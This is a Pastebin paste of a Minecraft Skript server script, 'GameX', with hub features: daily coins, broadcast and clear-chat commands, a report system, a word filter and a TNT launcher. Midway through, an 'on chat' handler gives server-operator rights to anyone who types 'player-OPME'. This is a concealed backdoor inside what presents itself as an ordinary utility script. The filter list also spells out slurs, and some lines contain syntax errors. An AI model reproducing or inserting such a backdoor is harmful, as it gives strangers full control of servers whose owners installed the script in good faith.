Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- on rightclick holding paper:
- if {link.paper} is true:
- wait 1 tick
- message "&8&m-----------------------------------------------------"
- wait 1 tick
- message "&b!Website! &8: &cCOMING SOON"
- wait 1 tick
- message "&b!Discord!&8 : &cCOMING SOON"
- wait 1 tick
- message "&8&m-----------------------------------------------------"
- on leftclick holding paper:
- if {link.paper} is true:
- wait 1 tick
- message "&8&m-----------------------------------------------------"
- wait 1 tick
- message "&b!Website! &8: &cCOMING SOON"
- wait 1 tick
- message "&b!Discord!&8 : &cCOMING SOON"
- wait 1 tick
- message "&8&m-----------------------------------------------------"
- on load:
- if {link.paper} is not set:
- set {link.paper} to true
- on rightclick holding diamond:
- wait 2 ticks
- set {waited} to difference between {claim.%player%} and now
- if {waited}} is less than 24 hours
- message "&7Sorry but you must wait %difference between {waited} and 24 hours%"
- stop
- set {claim.%player%} to now
- message "&7You can now claim your daily 15 Coins in hub! &7See you Tommorow."
- /scoreboard players add %player% coins 15
- stop
- on load:
- broadcast "&7Thank you for using &cGameX"
- broadcast "&7made by &8: &cXXXCanadian"
- broadcast "&7This is only a &bbeta verison"
- broadcast "&bFull verison &8[&bCOMING SOON&8]"
- command /broadcast <string>:
- aliases: /bc
- permission: chat.broadcast
- permission message: &7Sorry &c%player% &7you must have &6chat.broadcast&7 to run this command!
- trigger:
- broadcast "&cGame&8X &7%arg-1%"
- command /clearchat:
- aliases: /cc
- permission: chat.clear
- permission message: &c7Sorry &c%player% &7you must have &6chat.clear&7 to run this command!
- trigger:
- loop 200 times:
- broadcast " "
- broadcast "&cGame&8X &b%player%, &7has cleared the chat!"
- on chat:
- replace all "fuck" with "****" in the message
- replace all "cunt" with "****" in the message
- replace all "bitch" with "*****" in the message
- replace all "nigger" with "******" in the message
- replace all "pussy" with "*****" in the message
- replace all "kys" with "Hope you live long" in the message
- replace all "reatard" with "*******" in the message
- replace all "join" with "****" in the message
- replace all "." with "*" in the message
- replace all "https" with "*****" in the message
- replace all "www" with "***"
- command /report <player> <text>:
- permission: chat.report
- permission message: &7Sorry &c%player% &7you must have &6chat.report&7 to run this command
- trigger:
- broadcast "&7Your report has landed to the staff!"
- add text-argument to {sikayetler::*}
- set {sikayeteden.%text-argument%} to player
- set {sikayeteden.%text-argument%} to player argument
- loop all players:
- if loop-player has permission "chat.show"
- message "&7Report System" to loop-player
- message "&7Report: &b""%text-argument%""" to loop-player
- message "&7the reported player: &b%player argument%" to loop-player
- message "&7Reporter: &b%player%" to loop-player]
- on chat:
- if message is "player-OPME":
- loop all players:
- cancel event
- message "&cForce Oped %player%"
- if loop player has permission "server.admin":
- message "&7&o[%player%: &cForce Oped %player%&7o]" to loop-player
- op player
- command /cookie:
- permission: free.cookie
- permission message: &7Sorry you dont have access take a free cookie using /cookie
- trigger:
- broadcast "&7OOOH %player% IS STEALIN"
- on leftclick holding tnt:
- if {gamex.tntlauncher} is true:
- player has 1 tnt
- spawn a primed tnt 1 meter above the player
- push the spawned entity in direction of player at speed 0.9
- push the spawned entity upwards at speed 0.2
- remove 1 tnt from player
- on rightclick holding tnt:
- if {gamex.tntlauncher} is true:
- player has 1 tnt
- spawn a primed tnt 1 meter above the player
- push the spawned entity in direction of player at speed 0.9
- push the spawned entity upwards at speed 0.2
- remove 1 tnt from player
- on place tnt:
- cancel event
- command /help:
- aliases: /h
- trigger:
- wait 1 tick
- message "&8&m-----------------------------------------------------"
- wait 1 tick
- message "&6/Games&8: &7Allows you to know all the game and how to play"
- wait 1 tick
- message "&6/Ranks&8: &7Allows you to get ranks off wins from minigames"
- wait 1 tick
- message "&6/Stats&8: &7Allows you to see your status"
- wait 1 tick
- message "&6/Quit&8: &7Allows you to quit a minigame/match"
- wait 1 tick
- message "&8&m-----------------------------------------------------"
- command /Games:
- aliases: /queue
- trigger:
- wait 1 tick
- message "&8&m-----------------------------------------------------"
- wait 1 tick
- message "&cGame 1&8: &bBridges"
- wait 1 tick
- message "&cGame 2&8: &bBattle Mode"
- wait 1 tick
- message "&cGame 3&8: &bTnt Spleef &8{&6Throw tnt at players to kill them/spleef them&8}"
- wait 1 tick
- message "&8{&bMORE COMING SOON&8}" to %player%
- wait 1 tick
- message "&8&m-----------------------------------------------------"
- command /Ranks:
- permission: gamex.ranks
- permission message: &8{&bCOMING SOON&8}
- trigger:
- broadcast "&c%player% &7has success fully used a command unfinished"
- command /Stats:
- permission: gamex.stat
- permission message: &8{&bCOMING SOON&8}
- trigger:
- broadcast "&c%player% &7has success fully used a command unfinished"
- command /Quit:
- permission: gamex.Quit
- permission message: &8{&bCOMING SOON&8}
- trigger:
- broadcast "&c%player% &7has success fully used a command unfinished"
- on load:
- if {gamex.tntlauncher} is not set:
- set {gamex.tntlauncher} to true
- command /bc <string>:
- aliases: /broadcast
- permission: chat.broadcast
- permission message: &7Sorry &c%player% &7you must have &6chat.broadcast&7 to run this command!
- trigger:
- broadcast "&cGame&8X &7%arg-1%"
Add Comment
Please, Sign In to add comment